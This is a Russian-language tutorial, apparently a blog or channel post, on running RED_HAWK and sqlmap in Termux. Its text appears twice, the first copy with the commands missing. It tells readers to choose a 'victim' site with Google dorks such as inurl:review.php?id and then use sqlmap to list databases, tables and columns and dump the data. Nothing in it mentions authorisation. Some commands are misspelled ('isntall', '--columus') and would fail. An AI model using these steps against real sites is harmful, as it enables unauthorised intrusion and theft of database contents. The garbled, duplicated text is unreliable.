Пентест в termux.
Сегодня мы разберем несколько инструментов для пентеста. Но перед этим разберемся что такое пентест.
Пентест - испытание на проникновение, если своими словами то Bзлom чего-либо с "ознакомительной целью".
1.REDHAWK - инструмент для сбора информации и сканировании уязвимостей сайта.
Установка :
После запуска инструмента, нам потребуется выбрать тип атаки (сбора информации) , и ввести адрес сайта
2. Sqlmap - это инструмент , который позволяет проверять сайты и находить в них уязвимости SQL - инъекций.
Установка:
Использование :
1.Для начала нам нужно выбрать жертву, для этого мы воспользуемся дорками - запрос в поисковик в ответ на который система выдаст список страниц сайтов . Нам нужно искать дорки - inurl:review.php?id - это лишь пример но фраза PHP?ID важна , в каждой дорке она должна быть.
2. Команды :
Команда производит проверку на уязвимость:
--dbs - это по типу быстрого скана если она не помогла найти уязвимости то можно воспользоваться такими ключами : —risk(1/3)/level(1/5)
Смотрим базы с помощью команды :
Смотрим колонки базы данных :
Делаем дамп баззы данных (скачивание) :
Думаю для начала этого будет достаточно , и важно все названия таблиц, сайтов и т.д пишутся без кавычек.
Сегодня мы разберем несколько инструментов для пентеста. Но перед этим разберемся что такое пентест.
Пентест - испытание на проникновение, если своими словами то Bзлom чего-либо с "ознакомительной целью".
1.REDHAWK - инструмент для сбора информации и сканировании уязвимостей сайта.
Установка :
pkg update && pkg upgrade
pkg install git
pkg install php
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
php rhawk.php
После запуска инструмента, нам потребуется выбрать тип атаки (сбора информации) , и ввести адрес сайта
2. Sqlmap - это инструмент , который позволяет проверять сайты и находить в них уязвимости SQL - инъекций.
Установка:
apt update && apt upgrade -y
apt install git
apt isntall python2
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
python2 sqlmap.py
Использование :
1.Для начала нам нужно выбрать жертву, для этого мы воспользуемся дорками - запрос в поисковик в ответ на который система выдаст список страниц сайтов . Нам нужно искать дорки - inurl:review.php?id - это лишь пример но фраза PHP?ID важна , в каждой дорке она должна быть.
2. Команды :
Команда производит проверку на уязвимость:
python2 sqlmap.py -u "url без кавычек" --dbs
--dbs - это по типу быстрого скана если она не помогла найти уязвимости то можно воспользоваться такими ключами : —risk(1/3)/level(1/5)
Смотрим базы с помощью команды :
python2 sqlmap.py -u "url без кавычек" -D "название базы данных " --tables
Смотрим колонки базы данных :
python2 sqlmap.py -u "url без кавычек" -D "название базы данных " -T "название таблицы" --columus
Делаем дамп баззы данных (скачивание) :
python2 sqlmap.py -u "url без кавычек" -D "название базы данных " -T "название таблицы" --dump
Думаю для начала этого будет достаточно , и важно все названия таблиц, сайтов и т.д пишутся без кавычек.